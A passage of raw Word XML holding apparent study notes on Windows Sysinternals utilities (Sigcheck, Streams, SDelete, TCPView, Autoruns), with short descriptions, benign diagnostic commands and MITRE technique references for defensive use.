      <w:r w:rsidRPr="0084205E">
        <w:t>Network Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26484BD1" w14:textId="2A12212B" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="148F4A7C" w14:textId="7D15DA6B" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">C:\WINDOWS\system32&gt; control.exe /name </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Microsoft.NetworkAndSharingCenter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A693F6B" w14:textId="2EF83C22" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>click on Change Advanced Sharing Settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0427A3D2" w14:textId="2936EDB4" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Turn On Network Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EB7311" w14:textId="1FA585B8" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>enter a tool’s Sysinternals Live path into Windows Explorer or a command prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C07AE66" w14:textId="4B5D9564" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>live.sysinternals.com/&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>toolname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60390879" w14:textId="2E74AA66" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId65" w:history="1">
        <w:r w:rsidR="00222C63" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\live.sysinternals.com\tools\&lt;toolname</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00222C63" w:rsidRPr="0084205E">
        <w:t>&gt;.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FFEC8F" w14:textId="180986A9" w:rsidR="00222C63" w:rsidRPr="0084205E" w:rsidRDefault="00222C63" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:hyperlink r:id="rId66" w:history="1">
        <w:r w:rsidR="00790E6B" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\live.sysinternals.com\tools\procmon.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7563EF38" w14:textId="17A446D5" w:rsidR="00790E6B" w:rsidRPr="0084205E" w:rsidRDefault="00790E6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>File and Disk Utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143E1480" w14:textId="26491C1A" w:rsidR="00790E6B" w:rsidRPr="0084205E" w:rsidRDefault="00790E6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sigcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DC7E849" w14:textId="41C3F24F" w:rsidR="00790E6B" w:rsidRPr="0084205E" w:rsidRDefault="00790E6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>CLI utility that shows file version number, timestamp information, and digital signature details (including certificate chains)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15339825" w14:textId="62124E7B" w:rsidR="00790E6B" w:rsidRPr="0084205E" w:rsidRDefault="00790E6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Check file status on VirusTotal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7359AEA1" w14:textId="392CD6A8" w:rsidR="00790E6B" w:rsidRPr="0084205E" w:rsidRDefault="00790E6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0833AC39" w14:textId="615B4B74" w:rsidR="00790E6B" w:rsidRPr="0084205E" w:rsidRDefault="00790E6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>check for unsigned files in C:\Windows\System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066A882C" w14:textId="34E6E0B3" w:rsidR="00790E6B" w:rsidRPr="0084205E" w:rsidRDefault="00790E6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1846FCE9" w14:textId="13B92BB5" w:rsidR="00790E6B" w:rsidRPr="0084205E" w:rsidRDefault="00790E6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sigcheck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -u -e C:\Windows\System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CE7839" w14:textId="7595C660" w:rsidR="00790E6B" w:rsidRPr="0084205E" w:rsidRDefault="00790E6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-u – show files are unknown to VirusTotal or non-zero detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE853EE" w14:textId="756BDFF8" w:rsidR="00790E6B" w:rsidRPr="0084205E" w:rsidRDefault="00790E6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>-e – scan executable images only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467C25BA" w14:textId="63867B60" w:rsidR="00790E6B" w:rsidRPr="0084205E" w:rsidRDefault="00790E6B" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534146F7" w14:textId="52679058" w:rsidR="00CC6E04" w:rsidRPr="0084205E" w:rsidRDefault="00CC6E04" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>view Alternate Data Streams for files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A196DBD" w14:textId="0953DE37" w:rsidR="00CC6E04" w:rsidRPr="0084205E" w:rsidRDefault="00CC6E04" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>malware writers have used ADS to hide data in an endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD8FD97" w14:textId="35995AAC" w:rsidR="003F5E08" w:rsidRPr="0084205E" w:rsidRDefault="00CC6E04" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>not all uses are malicious</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57383912" w14:textId="68C52353" w:rsidR="00796A65" w:rsidRPr="0084205E" w:rsidRDefault="000C6777" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ex. :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ads.txt:$DATA 26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE90496" w14:textId="74572D9F" w:rsidR="000C6777" w:rsidRPr="0084205E" w:rsidRDefault="000C6777" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">open with notepad </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>file.txt:ads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3862A3E5" w14:textId="779BB635" w:rsidR="00CC6E04" w:rsidRPr="0084205E" w:rsidRDefault="00CC6E04" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SDelete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2BA9FC93" w14:textId="3899E6DE" w:rsidR="00CC6E04" w:rsidRPr="0084205E" w:rsidRDefault="00CC6E04" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>CLI utility that allows user to delete one or more files and/or directories, or to cleanse the free space on a logical disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033A9364" w14:textId="5C49CCA4" w:rsidR="00CC6E04" w:rsidRPr="0084205E" w:rsidRDefault="00CC6E04" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>implements DOD 5220.22-M sanitization protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C9209" w14:textId="785B104E" w:rsidR="00CC6E04" w:rsidRPr="0084205E" w:rsidRDefault="00CC6E04" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>used by adversaries under MITRE T1485 (Data Destruction) and T1070.004 (Indicator Removal on Host: File Deletion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588D86FB" w14:textId="4F7E1643" w:rsidR="00CC6E04" w:rsidRPr="0084205E" w:rsidRDefault="00CC6E04" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>MITRE ID S0195</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3328D897" w14:textId="6BA0B2AF" w:rsidR="000C6777" w:rsidRPr="0084205E" w:rsidRDefault="000C6777" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Networking Utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF3E3DB" w14:textId="222534B1" w:rsidR="000C6777" w:rsidRPr="0084205E" w:rsidRDefault="000C6777" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>TCPView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08633FC3" w14:textId="614758BE" w:rsidR="000C6777" w:rsidRPr="0084205E" w:rsidRDefault="000C6777" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>shows detailed listings of all TCP and UDP endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092467F0" w14:textId="49C5CF8E" w:rsidR="000C6777" w:rsidRPr="0084205E" w:rsidRDefault="000C6777" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>including local and remote address and state of TCP connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B84716" w14:textId="4CCEF562" w:rsidR="000C6777" w:rsidRPr="0084205E" w:rsidRDefault="000C6777" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>more informative and conveniently presented subset of the Netstat program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA8A14B" w14:textId="0A153A92" w:rsidR="000C6777" w:rsidRPr="0084205E" w:rsidRDefault="000C6777" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">include </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Tcpvcon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B749DAC" w14:textId="5BA37D4B" w:rsidR="000C6777" w:rsidRPr="0084205E" w:rsidRDefault="000C6777" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>Similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> Resource Monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0A9DE9" w14:textId="3972447D" w:rsidR="000C6777" w:rsidRPr="0084205E" w:rsidRDefault="000C6777" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>resmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> in CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA4760" w14:textId="1248EE5A" w:rsidR="000C6777" w:rsidRPr="0084205E" w:rsidRDefault="000C6777" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>called from Performance Tab in Task Manager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ECB4DC" w14:textId="5C32EC82" w:rsidR="000C6777" w:rsidRPr="0084205E" w:rsidRDefault="000C6777" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tcpview</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>accepteula</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28A81D81" w14:textId="676AC298" w:rsidR="000C6777" w:rsidRPr="0084205E" w:rsidRDefault="000C6777" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Show Unconnected Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B83CC8" w14:textId="05F83FA2" w:rsidR="000C6777" w:rsidRPr="0084205E" w:rsidRDefault="000C6777" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>displays processes with an established outbound connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FADD071" w14:textId="78360D63" w:rsidR="00A6575E" w:rsidRPr="0084205E" w:rsidRDefault="00A6575E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Process Utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAC97DC" w14:textId="2E0DFC96" w:rsidR="00A6575E" w:rsidRPr="0084205E" w:rsidRDefault="00167851" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Autoruns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699FCEA5" w14:textId="69ABD1BF" w:rsidR="00167851" w:rsidRPr="0084205E" w:rsidRDefault="00167851" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
